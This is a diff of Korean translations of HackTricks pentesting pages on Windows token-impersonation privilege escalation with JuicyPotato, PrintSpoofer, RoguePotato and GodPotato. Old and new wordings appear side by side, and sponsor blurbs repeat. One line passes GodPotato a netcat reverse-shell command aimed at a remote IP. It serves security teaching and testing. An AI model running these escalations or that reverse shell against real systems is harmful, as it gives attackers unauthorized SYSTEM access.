* [**PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견해보세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 받아보세요
* **💬** [**Discord 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 참여하시거나 **트위터**에서 저를 팔로우하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **해킹 요령을 공유하고 싶으시다면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출해주세요**.
* **사이버 보안 회사**에서 일하시나요? **HackTricks에 귀사를 광고하고 싶으신가요**? 혹은 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인세요!
* [**PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으세요.
* **💬** [**Discord 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **트위터**에서 **팔로우**하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **해킹 요령을 공유하고 싶으시다면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출하세요.**
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 무료로 엔진을 시험해볼 수 있습니다:
그들의 웹사이트를 확인하고 무료로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato는** Windows Server 2019 및 Windows 10 빌드 1809 이후에서 작동하지 않습니다. 그러나 [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)를 사용하여 동일한 권한을 활용하고 `NT AUTHORITY\SYSTEM` 수준의 액세스를 얻을 수 있습니다. _**확인:**_
**JuicyPotato는** Windows Server 2019 및 Windows 10 빌드 1809 이후에서 작동하지 않습니다. 그러나 [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)를 사용하여 **동일한 권한을 활용하고 `NT AUTHORITY\SYSTEM` 수준의 액세스를 얻을 수 있습니다. _**확인:**_
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %}
@ -36,7 +36,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
## Juicy Potato (황금 권한 남용) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
_RottenPotatoNG_의 달콤한 버전으로, **Windows 서비스 계정에서 NT AUTHORITY\SYSTEM으로의 로컬 권한 상승 도구**입니다.
_RottenPotatoNG_의 달콤한 버전으로, **다른 로컬 권한 상승 도구, Windows 서비스 계정에서 NT AUTHORITY\SYSTEM으로**_
#### [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)에서 juicypotato를 다운로드할 수 있습니다.
@ -44,17 +44,17 @@ _RottenPotatoNG_의 달콤한 버전으로, **Windows 서비스 계정에서 NT
[**juicy-potato Readme에서**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) 및 [변형](https://github.com/decoder-it/lonelypotato)은 [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [서비스](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)를 기반으로 한 권한 상승 체인을 활용하며, `127.0.0.1:6666`에서 MiTM 리스너를 가지고 있고 `SeImpersonate` 또는 `SeAssignPrimaryToken` 권한이 있는 경우입니다. Windows 빌드 검토 중에 `BITS`가 의도적으로 비활성화되었고 포트 `6666`이 사용 중임을 발견했습니다.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) 및 [변형](https://github.com/decoder-it/lonelypotato)은 [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [서비스](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)를 기반으로 한 권한 상승 체인을 활용하며, `127.0.0.1:6666`에서 MiTM 리스너를 가지고 있고 `SeImpersonate` 또는 `SeAssignPrimaryToken` 권한이 있는 경우입니다. Windows 빌드 검토 중에 `BITS`가 의도적으로 비활성화되었고 포트 `6666`이 사용 중임을 발견했습니다.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)을 무장화하기로 결정했습니다: **Juicy Potato를 만나보세요**.
> 이론에 대해서는 [Rotten Potato - 서비스 계정에서 SYSTEM으로의 권한 상승](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)을 참조하고 링크 및 참조 사슬을 따르세요.
> 이론적으로는 [Rotten Potato - 서비스 계정에서 SYSTEM으로의 권한 상승](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)을 참조하고 링크 및 참조 사슬을 따르세요.
우리는 `BITS` 이외에도 여러 COM 서버를 남용할 수 있다는 것을 발견했습니다. 그들은 단지:
`BITS` 이외에도 현재 사용자, 일반적으로 임펄슨 권한을 가진 "서비스 사용자"로 인스턴스화할 수 있는 여러 COM 서버를 남용할 수 있다는 것을 발견했습니다.
1. 현재 사용자, 일반적으로 임펄슨 권한을 가진 "서비스 사용자"가 인스턴스화할 수 있어야 합니다.
1. 현재 사용자에 의해 인스턴스화될 수 있어야 합니다. 일반적으로 임펄슨 권한을 가진 "서비스 사용자"
2. `IMarshal` 인터페이스를 구현해야 합니다.
3. 승격된 사용자(SYSTEM, 관리자, ...)로 실행되어야 합니다.
3. 고도의 사용자(SYSTEM, 관리자 등)로 실행해야 합니다.
일부 테스트를 거친 후, 여러 Windows 버전에서 [흥미로운 CLSID 목록](http://ohpe.it/juicy-potato/CLSID/)을 획득하고 테스트했습니다.
@ -72,7 +72,7 @@ JuicyPotato를 사용하면 다음을 수행할 수 있습니다:
* **시작할 프로세스** _악용이 성공하면 실행할 실행 파일 또는 스크립트_
* **프로세스 인수** _시작된 프로세스 인수를 사용자 정의하세요_
* **RPC 서버 주소** _외부 RPC 서버에 인증할 수 있는 은밀한 방법_
* **RPC 서버 포트** _외부 서버에 인증하려는 경우 방화벽이 포트 `135`를 차단하는 경우 유용합니다..._
* **RPC 서버 포트** _외부 서버에 인증하려는 경우 유용하며 방화벽이 포트 `135`를 차단하는 경우..._
* **테스트 모드** _주로 테스트 목적으로, 즉 CLSID를 테스트합니다. DCOM을 생성하고 토큰의 사용자를 출력합니다. 테스트를 위해_ [_여기를 참조하세요_](http://ohpe.it/juicy-potato/Test/)
### 사용법 <a href="#usage" id="usage"></a>
```
@ -95,7 +95,7 @@ Optional args:
[**Juicy Potato Readme에서**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
만약 사용자가 `SeImpersonate` 또는 `SeAssignPrimaryToken` 권한을 가지고 있다면 당신은 **SYSTEM**입니다.
만약 사용자가 `SeImpersonate` 또는 `SeAssignPrimaryToken` 권한을 가지고 있다면 **SYSTEM** 권한을 얻을 수 있습니다.
모든 이러한 COM 서버의 남용을 방지하는 것은 거의 불가능합니다. `DCOMCNFG`를 통해 이러한 객체의 권한을 수정할 수 있지만, 행운을 빕니다. 이것은 도전적일 것입니다.
@ -130,7 +130,7 @@ c:\Users\Public>
## CLSID 문제
대부분 JuicyPotato가 사용하는 기본 CLSID**작동하지 않고** exploit이 실패합니다. 일반적으로 **작동하는 CLSID**를 찾기 위해 여러 번 시도해야 합니다. 특정 운영 체제에 대해 시도할 CLSID 목록을 얻으려면 이 페이지를 방문해야 합니다:
대부분 JuicyPotato가 사용하는 기본 CLSID**작동하지 않을 수 있으며** 이로 인해 exploit이 실패할 수 있습니다. 일반적으로 **작동하는 CLSID**를 찾기 위해 여러 번 시도해야 합니다. 특정 운영 체제에 대한 시도할 CLSID 목록을 얻으려면 다음 페이지를 방문해야 합니다:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
@ -138,9 +138,9 @@ c:\Users\Public>
먼저, juicypotato.exe 이외의 몇 가지 실행 파일이 필요합니다.
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)를 다운로드하 PS 세션에 로드하고 [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)를 다운로드하고 실행하십시오. 해당 스크립트는 테스트할 가능한 CLSID 목록을 생성합니다.
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)를 다운로드하 PS 세션에 로드하고 [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)를 다운로드하고 실행하십시오. 해당 스크립트는 테스트할 가능한 CLSID 목록을 생성합니다.
그런 다음 [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(CLSID 목록 및 juicypotato 실행 파일 경로를 변경)을 다운로드하고 실행하십시오. 모든 CLSID를 시도하기 시작하고 **포트 번호가 변경되면 CLSID가 작동**한 것을 의미합니다.
그런 다음 [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(CLSID 목록 및 juicypotato 실행 파일 경로를 변경)을 다운로드하고 실행하십시오. 모든 CLSID를 시도하기 시작하고 **포트 번호가 변경되면 CLSID가 작동**한 것니다.
**-c 매개변수를 사용하여** 작동하는 CLSID를 **확인**하십시오.
@ -148,13 +148,13 @@ c:\Users\Public>
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **도난당한 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**를 당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
그들의 웹사이트를 방문하고 **무료**로 엔진을 시도해 볼 수 있습니다:
@ -162,12 +162,12 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)로부터 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)로부터 제로에서 영웅까지 AWS 해킹 배우기</strong></summary>
* **사이버 보안 회사**에서 일하시나요? **HackTricks에 귀사를 광고하고 싶으신가요**? 또는 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 받으세요
* **💬** [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **해킹 트릭을 공유하려면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출**하세요.
* **사이버 보안 회사에서 일하십니까?** **HackTricks에 귀사를 광고하고 싶으십니까?** 또는 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으십니까? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하십시오!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하십시오. 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으십시오
* **💬** [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하십시오.
* **해킹 트릭을 공유하려면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **에 PR을 제출**하십시오.
</details>

View file

@ -2,37 +2,37 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있습니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato**는 Windows Server 2019 및 Windows 10 빌드 1809 이후에서 작동하지 않습니다. 그러나 [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)를 사용하여 **동일한 권한을 활용하고 `NT AUTHORITY\SYSTEM` 수준의 액세스를 얻을 수 있습니다.** 이 [블로그 포스트](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)는 `PrintSpoofer` 도구에 대해 자세히 설명하며, JuicyPotato가 더 이상 작동하지 않는 Windows 10 및 Server 2019 호스트에서 임의 사용 권한을 악용하는 데 사용할 수 있습니다.
**JuicyPotato**는 Windows Server 2019 및 Windows 10 빌드 1809 이후에서 작동하지 않습니다. 그러나 [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)를 사용하여 동일한 권한을 활용하고 `NT AUTHORITY\SYSTEM` 수준의 액세스를 얻을 수 있습니다. 이 [블로그 포스트](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)는 `PrintSpoofer` 도구에 대해 자세히 설명하며, JuicyPotato가 더 이상 작동하지 않는 Windows 10 및 Server 2019 호스트에서 임의 권한을 남용하는 데 사용할 수 있습니다.
{% endhint %}
## Quick Demo
## 빠른 데모
### PrintSpoofer
```bash
@ -90,28 +90,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**를 통해 제로부터 AWS 해킹을 전문가로 배우세요</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**와 함께 **제로**부터 **히어로**가 되는 방법으로 AWS 해킹을 배우세요!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에하의 회사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
* **HackTricks에 귀사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 우리의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우하세요.**
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>